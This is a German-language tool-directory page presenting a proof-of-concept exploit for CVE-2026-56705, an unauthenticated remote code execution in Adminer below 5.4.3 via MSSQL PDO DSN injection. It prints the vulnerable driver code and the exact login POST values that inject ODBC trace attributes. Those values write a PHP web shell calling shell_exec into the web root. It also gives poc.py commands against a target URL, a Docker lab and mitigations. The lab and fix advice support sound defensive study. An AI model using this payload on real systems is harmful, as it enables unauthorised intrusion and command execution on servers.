Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-56705 — PoC-Exploit für Adminer < 5.4.3 unbeabsichtigte RCE über MSSQL-PDO-DSN-Injection, inklusive Docker-Lab und Negativtest. | Kitploit
Tools/GitHubGitHub/boreas37/cve-2026-56705
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed TeamingLabs & Praxis
GitHubboreas37/cve-2026-56705

CVE-2026-56705

PoC-Exploit für Adminer < 5.4.3 unbeabsichtigte RCE über MSSQL-PDO-DSN-Injection, inklusive Docker-Lab und Negativtest.

Repository anzeigen
2vor 1 TagNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-56705: Adminer < 5.4.3 — Nicht authentifizierte RCE durch MSSQL-PDO-DSN-Injection

CVECVE-2026-56705
GHSAGHSA-r4x9-5m63-3vxw (Hersteller-Advisory) / GHSA-34q8-53jm-qc2r (GitHub-DB)
ProduktAdminer (Ein-Datei-PHP-Datenbankverwaltungstool)
BetroffenAdminer < 5.4.3 mit pdo_sqlsrv + Microsoft ODBC-Treiber für SQL Server
Behoben in5.4.3
CVSS9.8 Kritisch (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
TypCWE-20 → nicht authentifiziertes beliebiges Dateischreiben → RCE

Zusammenfassung

Adminer bereinigt das vom Benutzer bereitgestellte Feld server nicht, bevor die PDO-DSN für MSSQL-Verbindungen erstellt wird:

root@kitploit:~
// adminer/drivers/mssql.inc.php
function attach(string $server, string $username, string $password): string {
    list($host, $port) = host_port($server);
    return $this->dsn("sqlsrv:Server=$host" . ($port ? ",$port" : ""), $username, $password);
}

Semikolons in server werden als Trennzeichen für ODBC-Verbindungsattribute behandelt, sodass ein nicht authentifizierter Angreifer beliebige Attribute an die DSN anhängen kann — einschließlich TraceFile und TraceOn. Die unixODBC-Trace-Funktion schreibt die vollständige Verbindungszeichenfolge (mit UID={username} wörtlich) in TraceFile vor und unabhängig davon, ob die Verbindung erfolgreich ist. Das Injizieren von PHP-Code über das Feld username und das Ausrichten von TraceFile auf das Web-Root erzeugt eine Web-Shell.

Ein einzelner nicht authentifizierter Login-POST reicht aus. Keine gültigen Anmeldedaten, keine Benutzerinteraktion.

Ausnutzung

root@kitploit:~
auth[driver]   = mssql
auth[server]   = 127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
auth[username] = <?php echo 'POC::'.shell_exec($_GET['c']);?>
auth[password] = x
  1. Login-POST erstellt DSN sqlsrv:Server=127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
  2. Der ODBC-Treibermanager schreibt einen Trace mit UID={<?php ... ?>} in /var/www/shell.php
  3. Die Verbindung schlägt fehl (erwartet, irrelevant) — die Datei ist bereits geschrieben
  4. GET /shell.php?c=id → Befehl wird ausgeführt

Verwendung

root@kitploit:~
# Nur Fingerprinting
python3 poc.py --target http://target/adminer.php --check

# Vollständiger Exploit (schreibt <random>.php in das Web-Root)
python3 poc.py --target http://target/adminer.php --command "id"

Labor-Reproduktion

root@kitploit:~
cd lab/
docker build -t adminer-cve-2026-56705 .
docker run -d -p 8081:8081 adminer-cve-2026-56705
python3 ../poc.py --target http://localhost:8081/adminer.php --command id

Das Labor-Image spiegelt die Voraussetzungen des Advisories exakt wider: php:8.3-cli + pdo_sqlsrv (pecl) + msodbcsql18, Web-Root beschreibbar durch den PHP-Prozess.

Abhilfe

  • Upgrade auf Adminer 5.4.3+.
  • Falls ein sofortiges Upgrade nicht möglich ist: Entfernen/Sperren des mssql-Treibers oder Entfernen von ; (und Leerzeichen) aus benutzergelieferten server-Werten an einem Reverse-Proxy.
  • Web-Root gegen Schreibzugriffe durch den PHP-FPM/CLI-Benutzer als Defense-in-Depth einschränken.

Anerkennung

Das Hersteller-Advisory schreibt die Entdeckung gemeinsam dem Melder und Yashar Shahinzadeh (@voorivex) zu.

PoC & Labor: Hamza Cagrici (@Boreas37)

Zeitplan

DatumEreignis
2026-08-25CVE veröffentlicht / behoben in Adminer 5.4.3
Tool herunterladen